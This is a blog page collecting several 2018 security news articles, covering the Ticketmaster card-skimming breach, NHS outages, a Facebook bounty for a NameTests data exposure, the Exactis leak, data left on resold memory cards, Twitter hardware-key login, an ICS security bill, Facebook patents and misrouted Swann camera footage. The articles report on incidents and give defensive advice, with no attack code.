STE WILLIAMS

The Ticketmaster breach – what happened and what to do

Live Nation Entertainment subsidiary Ticketmaster has admitted it has suffered a serious data breach affecting 40,000 of its British and international customers.

Anyone who used the Ticketmaster UK, GETMEIN! and TicketWeb sites to book tickets from February 2018 and 23 June 2018 may have had data compromised, including their name, email address, physical address, telephone number, Ticketmaster logins, and payment card details.

In addition, so-called “international customers” who bought, or tried to buy, tickets between September 2017 and 23 June 2018 could also be affected. (US customers are not part of the alert.)

The issue was caused by malware, spotted on 23 June 2018, that had infected a customer support system managed by Ticketmaster partner Inbenta Technologies, according to an email sent to affected account holders on Wednesday afternoon.

So far, the breach response is still at a stage described by Ticketmaster as follows:

Forensic teams and security experts are working around the clock to understand how the data was compromised.

In other words, we now all know that there was a breach, but not yet how it happened.

What’s happened to the stolen data?

Often, breach notifications refer to card payment data almost in passing, which invites readers to infer that although the data could have been compromised in theory, it wasn’t accessed in practice.

In this case, however, it seems pretty certain that payment card data was not only stolen but is also already being abused.

Digital banking company Monzo claims that the Ticketmaster website showed up as what’s known as a CPP (common point of purchase) in an above-average number of recent fraud reports:

On Friday 6th April [2018], around 50 customers got in touch with us to report fraudulent transactions on their accounts and we immediately replaced their cards.

The company noticed that 70% of these transactions had used the Ticketmaster site between December 2017 and April 2018.

And there’s more:

Given the pattern that was emerging, we decided to reach out to Ticketmaster directly. On Thursday 12th April [2018], members of the Ticketmaster security team visited the Monzo office so we could share the information we’d gathered. They told us they’d investigate internally.

Monzo said it had even sent out 6000 replacement cards in April 2018 to customers who had used Ticketmaster.

If Monzo has it right, it looks as though Ticketmaster was told of the problem more than two months ago, well before it acted on unusual activity last weekend, as stated in its notifiocation email:

On Saturday, June 23, 2018, Ticketmaster UK identified malicious software on a customer support product hosted by Inbenta Technologies, an external third-party supplier to Ticketmaster.

That might have been prompted after MasterCard, also told of the issue by Monzo, issued an alert on 21 June 2018.

Ticketmaster may end up with questions from the UK Information Commissioner’s Office (ICO) about the apparent delay in telling its customers.

What to do?

  • If you’re one of the 40,000 account holders that Ticketmaster says was affected by the compromise, you should have received an email telling you to change your account password. This process should happen automatically the next time you try to log in.
  • If you haven’t been contacted, it’s still a good opportunity to ask yourself whether your Ticketmaster password is sufficiently strong. Change it if there’s any doubt. (This can be done by visiting the Ticketmaster “Forgotten Password” link.)
  • Keep an eye on your bank and payment card statements. Ticketmaster said it will offer affected customers a free 12-month identity monitoring service with a “leading provider”, but whether you take that offer up or not, you need to be on the lookout for unauthorised activity on your accounts.
  • Replace your payment cards as soon as you can if you’re on the list of Ticketmaster customers known to have been affected. In theory, the crooks oughtn’t to have the 3-digit CVV code from the back of your card, and in Europe they oughtn’t to be able to clone your card, thanks to Chip and PIN, but you should get a new card (which invalidates the old one immediately) anyway.
  • Remember that it’s not just card payments that are at risk – the stolen data includes names and addresses, which puts you at risk of identity theft.
  • Keep a special eye and ear out for fraudulent emails, instant messages and phone calls that claim to be connected to this incident. If someone contacts you “about the breach”, never call or message them back based on contact information they gave to you – always find an independent source for the relevant phone number or email address, such as a printed receipt.

WATCH NOW…


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/n63KKjPK1eE/

Cyber nasties downed NHS systems for 1,300 hours over 36 months

NHS trusts across England experienced more than 1,300 hours of downtime in the last three years, according to results from a Freedom of Information request (FoI).

Nearly a third of the trusts (25 out of 80) that responded to an FoI request from Intercity Technology admitted they had experienced outages across their IT systems between January 2015 and February 2018.

Of the 25 trusts that endured a digi-blackout, 14 did so as a result of a security breach. In total, the trusts experienced 18 security breaches over the last three years, causing 18 days of downtime.

These attacks included the infamous WannaCry ransomware outbreak in May 2017, while others fell victim to the Locky and Zepto malware, the most severe of which knocked systems offline for two weeks.

One trust alone experienced an average of one breach per year, while others referenced cyber attacks that affected servers, PCs and internal systems. Another trust suffered problems after an unauthorised device was plugged into a network. This disrupted the business of two wards last year, resulting in downtime of approximately two hours.

Five trusts took their systems offline as a precautionary measure, in response to the WannaCry attack.

Intercity Technology sent 143 NHS Trusts in England FoI requests in February 2017. Eighty responded. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/06/28/nhs_downtime_troubles/

Facebook shells out $8k bug bounty after quiz web app used by 120m people spews profiles

Facebook has forked out an $8,000 reward after a security researcher flagged up a third-party web app that potentially exposed up to 120 million people’s personal information from their Facebook profiles.

This is quite possibly the first cash payment under the social network giant’s new data abuse bug bounty program.

The under-fire Silicon Valley goliath introduced the bug bounty program in April after the Cambridge Analytica data-harvesting scandal. It offered a minimum of $500 – and no maximum – for anyone that provided proof that a third-party app had collected and transferred Facebook profile data to other parties. It is also a handy PR move by the biz.

Given that it’s only been two months since the scheme was launched and these kinds of investigations can take up to six months, it’s likely that this payout is the first, though Facebook have yet to confirm that this is the case, along with how many other reports are being investigated.

The bounty was awarded after self-described ethical hacker Inti De Ceukelaire found the quiz app at Nametests.com potentially exposed the data of more than 120 million monthly users.

Grabby code

In a blog post yesterday, De Ceukelaire said the web app fetched his personal data and stored it at nametests.com/appconfig_user, and was available for other sites to swipe it while he remained logged in. “In theory, every website could have requested this data,” he said.

Trying to catch money in a net

Facebook: Look at our latest bug bounty that proves we’re serious!

READ MORE

Essentially, a malicious webpage in another tab can request the above URL to grab your profile details, once you’ve connected Nametests to your Facebook account. The app attempts to work out “what does your name really mean?”

Information revealed included first name, last name, language, gender and birth date – all of which would remain accessible even after the app was disconnected from a Facebook account. In addition, a token also gave access to all the data the user had authorised the application to access, which might include photos, posts or friend lists.

“I was shocked to see that this data was publicly available to any third-party that requested it,” said De Ceukelaire.

To demonstrate that the information could be nabbed, De Ceukelaire set up a website that connects to NameTests and gains access to a person’s posts, photos, and friends for up to two months. Here’s a video demonstrating the slurp:

Youtube Video

NameTests was launched in 2015, and De Ceukelaire reckons the flaw was present since 2016, and, as the app claims some 120 million users each month, it could have affected a large number of people.

“Abusing this flaw, advertisers could have targeted (political) ads based on your Facebook posts and friends,” the researcher said. “More explicit websites could have abused this flaw to blackmail their visitors, threatening to leak your sneaky search history to your friends.”

However, as De Ceukelaire pointed out, it isn’t clear how many people, if any, have been affected, noting also that only users that visited an attacker’s website would have their data leaked to the attacker.

An early starter

De Ceukelaire reported the bug on April 22, just 12 days after bug bounty program was announced, and this week spotted that NameTests had changed the way it processed data, with third parties no longer able to download the information.

On contacting the Zuckerborg, the biz agreed to pay a bounty of $4,000, which it doubled because De Ceukelaire had requested it be given to non-profit the Freedom of the Press Foundation (every chance for a good PR opp, eh?).

Ime Archibong, veep of product partnerships at Facebook, said: “A researcher brought the issue with the nametests.com website to our attention through our Data Abuse Bounty Program that we launched in April to encourage reports involving Facebook data. We worked with nametests.com to resolve the vulnerability on their website, which was completed in June.”

However, the presence of such a simple flaw raises questions about Facebook’s screening processes, as basic security tests should have spotted the problem.

No foul on our part

For its part, NameTests.com has a set of guarantees on its feedback page, which includes that data will never been sold to third parties, that users can unsubscribe at any time and that it complies with “strict data protection laws.”

In a statement to El Reg, it said that data security was taken very seriously and measures were being taken to avoid risks in the future. It added: “The investigation found that there was no evidence that personal data of users was disclosed to unauthorised third parties and all the more that there was no evidence that it had been misused.”

Meanwhile, Facebook is undertaking a wider probe into apps that accessed user data before the firm announced changes to its Graph API use policies in 2014 – this is at the heart of the Cambridge Analytica scandal because it allowed the app developed by GSR to suck up info on not just a user, but also all of their friends.

Last month, the tech giant offered a progress update, saying that it had suspended 200 apps “pending a thorough investigation into whether they did in fact misuse any data.”

The biz has promised to notify users if there is evidence of any apps misusing data. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/06/28/facebook_data_abuse_bug_bounty/

Newly Revealed Exactis Data Leak Bigger Than Equifax’s

Marketing data firm left its massive database open to the Internet.

What happens when you leave a database filled with personal information open to the Internet? People find it: That’s what happened to marketing data firm Exactis with its database of information on roughly 340 million people.

Security researcher Vinnie Troia of Night Lion Security discovered the database through a Shodan search. Exactis is a marketing data company that provides companies with the sort of information needed to target ads to people browsing the Web.

Troia told Wired, “It seems like this is a database with pretty much every US citizen in it,” adding, “I don’t know where the data is coming from, but it’s one of the most comprehensive collections I’ve ever seen.”

While the data did not include credit card or social security numbers, it did include everything from political preferences to browsing and purchase data for a wide variety of items. Taken together, the pieces of information would allow an advertiser or database user to form a very detailed picture of the targeted individual.

“The data reported to have been leaked is incredibly comprehensive and can be used by hackers to develop more targeted phishing scams,” said John “Lex” Robinson, cybersecurity strategist at Cofense. “Phishing is a serious threat because it works, with personalized phish often making their way past stacks of expensive technology layers and email gateways to land in an unsuspecting user’s inbox.”

In terms of size, the Exactis leak dwarfs the Equifax breach, which exposed nearly 146 million records. Exactis has now taken the database off the public Internet, but has made no public statement on the affair. At the time of this article’s publication, the company’s website was down, with a request returning a 508 error.

For more, read here and here.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/newly-revealed-exactis-data-leak-bigger-than-equifaxs/d/d-id/1332175?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

65% of Resold Memory Cards Still Pack Personal Data

Analyzed cards, mainly from smartphones and tablets, contained private personal information, business documentation, audio, video, and photos.

Wipe your device, then check it twice: A new study has found most secondhand memory cards contain personal information belonging to previous owners who either failed to properly remove their data or didn’t attempt to delete it at all.

“We make such a big deal out of Facebook giving away our details, but many of us just leave this stuff out there on our local memory,” says Comparitech privacy advocate Paul Bischoff.

In a study conducted by the University of Hertfordshire and commissioned by Comparitech, researchers bought and analyzed 100 used SD and micro SD memory cards from eBay, secondhand shops, auctions, and other sources over a four-month period. They created a forensic image of each card and used freely available software to recover data.

Most of the cards came from smartphones and tablets, Bischoff says, but some also came from satellite navigation systems, cameras, and drones. Sixty-five of the 100 cards analyzed still contained troves of personal materials: contact lists, browsing histories, intimate photos, passport copies, resumes, identification numbers, and business documentation, among them.

“It’s really easy when people get a new device to just throw out the old one and get rid of it completely,” Bishop notes. “If this information gets out there into the wrong hands, it could do a lot of damage … identity theft, extortion, blackmail.”

Only twenty-five cards had been properly wiped so that no information could be recovered. Thirty-six were not wiped at all; neither their owners nor sellers took any steps to try and erase the data, either. Twenty-nine appeared to have been formatted, meaning their owners attempted to try and erase their information, but data still could be revered “with minimal effort,” researchers explain. Four were broken, four were blank, and two had had their data deleted, but it was easily recoverable.

If a card is tossed without the proper precautions, Bischoff says, it’s fairly easy for any third party to access the data inside. “It really doesn’t take much know-how,” he explains, noting that the researchers used free forensics software they found online to recover information.

Their findings indicate how device owners, businesses, and resellers are responsible for wiping information before it falls into someone else’s hands. Users need to be more careful about deleting their data, of course, but resellers also need to properly wipe devices sold to them. Card manufacturers also play a role in making the process of erasing and disposing of cards both easier and more apparent for users, Bischoff adds.

“If it’s corporate-owned, it really depends on what the business structure is for dealing with this sort of thing,” he continues. In the case of BYOB devices, IT teams might not be able to remotely control or access an employee’s smartphone or tablet. Bischoff says the cards containing business data in this study were likely personal and that the owners downloaded sensitive files.

Phones containing sensitive data should have all files backed up in a secure cloud or have user access controls to block users from saving important devices local on the device.

Researchers anticipate problems related to improperly erased data will continue as local storage gets less expensive and people store more types of information on memory cards. However, Bischoff argues, the expansion of cloud storage will cause people to shift.

“Obviously storage demands are increasing, but the rise of the cloud will minimize the effects to some degree,” he says. “I think people will store in the cloud and skip local storage altogether.”

How to Properly Delete Data
If you plan on reselling your smartphone, laptop, camera, or other device equipped with an SD or micro SD card, you need to properly delete the data. Many people try to wipe their SD cards but fail to get rid of all the information. Simply deleting a file from the device doesn’t actually delete the ones and zeroes that make up the file; those stay on the device until overwritten.

You need to perform the “full format,” not “quick format,” Bischoff says. The process varies depending on your operating system, but both Windows and Mac devices have built-in formatting to erase all information from an external storage device.

Related Content:

Why Cybercriminals Attack: A DARK READING VIRTUAL EVENT Wednesday, June 27. Industry experts will offer a range of information and insight on who the bad guys are – and why they might be targeting your enterprise. Go here for more information on this free event.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/mobile/65--of-resold-memory-cards-still-pack-personal-data/d/d-id/1332179?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

There’s No Automating Your Way Out of Security Hiring Woes

The paradox of cybersecurity automation: It makes your staff more productive but takes more quality experts to make it work.

Enterprises increasingly depend on security automation and orchestration to help them keep up with the growing volume of cyberthreats. But at the same time, backlash is growing against the vendor marketing trope that security automation is the answer to bridging the cybersecurity skills gap.

According to a Dark Reading survey conducted earlier this year, just 45% of organizations report that their security teams are fully staffed, and only 33% say they’re armed with the right mix of skills they need to meet the threats coming in the next year. More startlingly, 14% of those surveyed say there are plenty of skilled cybersecurity workers available to fill the ranks. Meantime, the latest Global Information Security Workforce Study from (ISC)2 says we’ll be facing a shortfall of security workers of 1.8 million by 2022.

And those are just a sampling of the skills shortage metrics. There are plenty more where these came from.

The reflexive answer from many in the industry is, “Well, let’s just automate our way out of this problem!” But security leaders on the front line of enterprise defense are stepping forward with more frequency to poke holes in that simplistic solution. The latest evidence of this comes by way of a study out this week from Ponemon Institute and Juniper Networks. 

The study shows that, yes, 64% of organizations believe security automation can increase the productivity of their security personnel. And 60% believe automated correlation of threat behavior is essential to addressing the volume of threats today.  

But at the same time, respondents’ answers indicate that automation isn’t going to solve the team-building problem. In fact, those hiring issues are making it difficult for many organizations to effectively leverage security automation. The study shows only 35% of organizations say their organizations have the in-house skills to effectively use security automation for responding to threats.  

“Automation will do anything but close the cybersecurity staffing gap,” says Druva CISO Drew Nelson. “Apply automation to security, and you are in a catch-22. Any tasks that are automated are likely to be simple, with defined start and end points. Any ‘remaining items’ are going to be left over for the security staff to carry out. Arguably, these are going to be the more painful and arduous tasks that are repetitive in nature but require deep technical and domain knowledge.”

Not only are the incident response and risk mitigation tasks left behind by automation more likely to require a more skilled responder to deal with, but getting automation properly set up also is an issue. More than half of organizations say they’re unable to recruit knowledgeable or skilled personnel to deploy their security automation tools. It also often requires a lot of in-the-field experience to identify and codify the processes to be automated within any given organization. And then there is the issue of integration. The study shows that 63% of organizations report difficulties integrating their security automation technology and tools with existing systems.

“While the desire to automate is understandable, the process of setting up the automation can be incredibly complex and resource-draining,” says Tim Helming, director of product management at DomainTools, which recently sponsored a different Ponemon Institute survey out last month that offered up similar results as this most recent study. That research concluded that automation is actually exacerbating rather than helping the skills shortage problem.

Related Content:

Why Cybercriminals Attack: A DARK READING VIRTUAL EVENT Wednesday, June 27. Industry experts will offer a range of information and insight on who the bad guys are – and why they might be targeting your enterprise. Go here for more information on this free event.

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.  View Full Bio

Article source: https://www.darkreading.com/careers-and-people/theres-no-automating-your-way-out-of-security-hiring-woes/d/d-id/1332180?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Twitter introduces another way for you to better secure your account

Twitter has added the ability to authenticate to the service using hardware tokens such as Yubico’s YubiKey.

Announced towards the end of a blog on the company’s efforts to deter spam and malicious bots, it marks a convenient step up in security for Twitter users who might already be using this type of security with other services.

The company introduced SMS-based Login Verification almost five years ago, but since then, it’s been slow to move with the times. What’s more, it’s been accepted for some time that SMS authentication is less than secure in number of different ways – it is vulnerable via the mobile app, through attacking the network, or through SIM swap fraud.

Six months ago, some time after this feature was enabled by other internet brands such as Google and Facebook, Login Verification became possible on Twitter through the use of third-party apps such as Google Authenticator, Duo Mobile, or Authy.

That has now been extended to FIDO Universal 2nd Factor (U2F) security keys. Using one makes it much harder to hack an account even when an attacker has got hold of the username and password because they also require physical possession of the token too.

You’ll find the Twitter setting to turn this on by visiting Settings and privacy Account Review your login verification methods Login Verification.

When we tried this on an account on without any method of verification in place, it asked us to enable SMS verification to the registered mobile number first, after confirming our password. With that step complete, the options to use an authentication app or enrol a token appeared.

This is an authentication check on the act of setting even stronger authentication, presumably to avoid attackers breaking into accounts and locking people out completely.

It’s worth saving a backup code to guard against the possibility of losing the key or not having access to the mobile authenticator app. You can print out a list of codes for safe keeping. Also, note that enabling Login Verification will require using a one-off temporary password on other desktop computers or apps – your usual username and password won’t work.

Explains Twitter’s Login Verification guide:

For example, if you enabled login verification in your account settings on the web and need to login to the Twitter for Mac app, you will need to use a temporary password to do so.

I set up authentication through Chrome without any problems, however the U2F key enrolment refused to complete on Firefox. I’m unsure why this happened (Firefox supports U2F authentication). I have sought clarification on this from Twitter – along with further detail on how mobile devices will support Twitter hardware authentication when those tokens lack NFC support. I will update this article if and when I hear back.

Twitter is also not forthcoming about how many of its users have bothered to turn authentication on in any form. If Google is anything to go by, very few.

That’s a huge shame. Authentication is an excellent, cheap security upgrade that everyone should use.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/nYIXlT4wyrU/

US legislators put industrial control system security on the map

After a spate of attacks on industrial control systems (ICS), the US this week officially recognized the need to secure them with a new bill. On Monday, House representatives passed legislation to bring these systems under the protection of the Department of Homeland Security.

H.R 5733, AKA the “DHS Industrial Control Systems Capabilities Enhancement Act”, is a short bill that effectively highlights industrial control systems as a vulnerable point in US critical infrastructure by including them in the 2002 Homeland Security Act. It amends the 2002 Act, which made no mention of ICS systems, to include specific language about them.

The new legislation calls on the National Cybersecurity and Communications Integration Center (NCCIC) to find and fix threats to industrial control system technologies used in critical infrastructure. It must help a range of stakeholders with technical assistance in fixing industrial control system projects, including manufacturers and end users.

The move may seem like a semantic one, but it is a reaction to a string of attacks that have worried lawmakers in the US. In October, US-CERT warned that hackers were targeting energy, nuclear, water, aviation and critical manufacturing sectors.

Insecure ICS could lead to disaster in unexpected areas. Experts warned last year of potential hacks that could compromise marine equipment around the world.

Don Bacon, the representative who authored the bill, warned of dire consequences if organizations running critical national infrastructure did not tighten up ICS security.

The next ‘Pearl Harbor attack’ will not be with missiles and torpedoes alone, but will be paired with attacks to our private sector functions needed to support our daily lives, such as our electric grid.

The new legislation may put ICS officially on the list of vulnerable systems to protect, but the key will be in the implementation, and especially in whether the DHS works to change the underlying mechanics of security in ICS component manufacturing. A 2017 report by MIT researcher Joel Brenner on critical infrastructure security highlighted the use of cheap, general purpose hardware and software as components in industrial component systems, driven by commercial concerns.

Brenner’s report called for an initiative to create incentives for producing and using secure and less complex hardware, software, and controls for use in critical infrastructure. This should be directed by a lead departmental secretary reporting directly to the President, it advised.

Having passed the house, the bill reached the Senate on Tuesday before being passed to the Committee on Homeland Security and Governmental Affairs.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/3z8zJuVbXog/

Are you happy with this technology that Facebook’s developing?

Technology developed and patented by Facebook suggests it’ll know when you’re sleeping, know when you’re awake… it’ll even know if you’ll live or die… so be good for goodness’ sake?

These patents filed by Facebook in the past few years, as reported by the New York Times, reveal some behind-the-scenes thinking into what Facebook has deemed worth developing and protecting. It doesn’t guarantee we’ll see these features in Facebook in the future necessarily, but it gives us an idea of where the social media giant generally thinks things are headed in how we (the consumer) use apps and what kind of personal data we might be willing to divulge.

Some of the patents are more surprising than others. Many seem like a logical progression from what Facebook already does: learning as much about us as possible to try and sell us things. These patents include:

  • One that classifies a user’s personality based on what they post publicly and send as messages, in order to serve more targeted stories and ads.
  • Another wants to figure out who our closest friends are by tracking our phone’s location relative to other phone locations.
  • Another aims to uniquely identify cameras based on flaws Facebook could discern, like a scratch or bad pixel.

To be honest, the more cynical (or savvy, depending on your point of view) may well have assumed that Facebook was already doing something along these lines as it is.

Other patents, however, may push the boundary not only on what we’re comfortable with Facebook knowing, but also what we’re comfortable knowing ourselves. These include:

  • A patent that the NYT writes, “describes using your posts and messages, in addition to your credit card transactions and location, to predict when a major life event, such as a birth, death or graduation, is likely to occur.”
  • Another that proposes listening in on the TV shows we’re watching and whether or not we listened to the ads.
  • One that proposes tracking our daily routines, including where we are and when, and potentially notifying someone else if we deviate too far from that routine.

You may have already opted-in to apps that do something similar to Facebook’s long list of patents. For example, one proposes learning how long we sleep by tracking how long our phone is stationary at night – many people already allow this as a method of tracking their sleep patterns and sleep quality with apps and wearable gadgets. In the case of iOS, these tracker gadgets and apps often work along with a Health app built in on iOS phones, so Apple already has all that fantastic data about your health and sleep habits.

The question might then become: Are consumers who share this information with Apple also comfortable sharing that kind of information with Facebook? In light of recent events, such as the Cambridge Analytica scandal, the answer may well be no.

Whether or not you think these kinds of features are a massive creepy overreach will likely depend on if you find them useful or not, and whether or not you’re comfortable with one company aggregating all this information. (And again, these patents are not a product roadmap for Facebook, so it is entirely possible we’ll never see them in action.)

What these patents do seem to indicate is that tech companies like Facebook will continue to push the limits on consumer comfort when it comes to data sharing. What remains to be seen is when – or if – consumers will decide they’re no longer happy to play along.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7q5uJZl6aMI/

OMG! I just received someone else’s security camera footage!

Here’s another “security surveillance system SNAFU” story, just two weeks since our last one.

(As we noted back then, plain old webcam bugs are one thing, but vulnerabilities in camera systems that are supposed to increase security are quite another.)

Last time, the problem was a combination of three different bugs, each one modestly dangerous on its own, that could be chained together to construct an critical exploit.

At worst, the trifecta of bugs in that case could have allowed anyone on the internet to wander into your network at will via one of your security devices.

In today’s story, however, the crooks didn’t break into the webcam and steal data out of it.

Instead, the camera uploaded a bunch of data on purpose, but chose the wrong person to send it to.

In fact, the person to who the video data was incorrectly leaked

…just happened to be a BBC staffer enjoying some off-duty weekend time at home.

Talk about having a fascinating data leakage story dropping into your app!

What happened?

If you think of CCTV systems from even just a few years ago, you’ll probably wonder what a security camera was doing dropping data into a app in the first place.

Well, surveillance systems have changed a lot recently.

CCTV cameras aren’t just wireless these days, but often also softwareless and serverless too.

OK, strictly speaking, the camera needs a server to connect to, and that server needs special software running to take care of the uploads, but both the server and the software can be hosted in the cloud.

As the owner of the camera, you no longer have to set up any additional hardware or software of your own – you need no more than the camera itself, an internet connection, and a web browser (or a browser-like app on your mobile phone) to login to the camera vendor’s website.

The vendor’s servers take care of collecting the data, processing it to look for anomalies, and sending alerts to your browser or your phone if something suspicious happens…

…and all you have to do is hope that they don’t send your alerts to someone else by mistake, as happened in this case.

What went wrong?

According to the BBC, Swann explained away the mistake as follows:

[H]uman error had caused two cameras to be manufactured that shared the same bank-grade security key – which secures all communications with its owner. This occurred after the [family] connected the duplicate camera to their network and ignored the warning prompt that notified: ‘Camera is already paired to an account’, and left the camera running.

This explanation is feasible, but it doesn’t bring any closure to the incident, because it implies that the problem could easily occur again – after all, how realistic is it to expect a human to check a cryptographic key, say 3c8c0279­dd24f6d7­c07a00db­30767ec4, against a list of all keys used on all previous devices?

Let’s assume that the key we’re talking about here is a public/private key pair, where the vendor’s servers get a copy of the public key so they can validate the camera sending in each data block, and the camera keeps the private key to itself so it’s the only device in the world that can sign content with that key.

Why not get the camera to generate a new keypair when it is first set up (or subjected to a factory reset), thus ensuring both that the private key only ever exists on the camera itself, and that the keypair is always unique?

Granted, it’s easy to make a cryptographic blunder when you program an IoT device to generate a new, random keypair, because random numbers can be tricky to generate in software on embedded devices,

Many pseudo-random number generators rely on mixing in ever-changing data such as the time of day, the number of milliseconds since the computer was turned on, or the distance that the mouse moved in the past 30 seconds, as a way of reducing the predictability.of the algorithm – a process known in the jargon as increasing entropy. On embedded devices fresh out of the box, however, there’s no mouse to monitor, the clock always starts off set to zero (on Linux-based systems, zero typically denotes midnight on 01 January 1970), and you can guess within a few seconds either way how long the initial setup software is like to take to get to the part where the cryptographic keys are generated. This means you need to be really careful not to generate “predictable randomness” when doing cryptographic programming on stripped-down hardware.

Nevertheless, with suitable care and attention, it is possible to ensure that each device you sell will automatically end up registered uniquely with your cloud services – Apple, for instance, can reliably tell its iPhones apart, even though it has sold more than a billion of them.

Could it happen again?

The BBC documented a second case in the UK of a Swann security system sending one customer’s data to another – a couple in Leicestershire, England who started receiving camera footage of an unknown pub.

In an amusing conclusion (albeit one that proves that even banal and harmless looking images can harm your privacy) the couple actually managed to identify the pub concerned.

Turns out it was near their house, so they paid a visit – and in a fit of wit, took a selfie using the pub’s camera!

What to do?

Let’s hope that Swann identifies the problems in its manufacturing workflow that make this sort of “doppelgänger camera” situation possible…

…and eliminates them.

At the moment, the company doesn’t sound very convincing in its response to what is an unusual, though unsettling, data breach dilemma.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/R8wKBGKGuKw/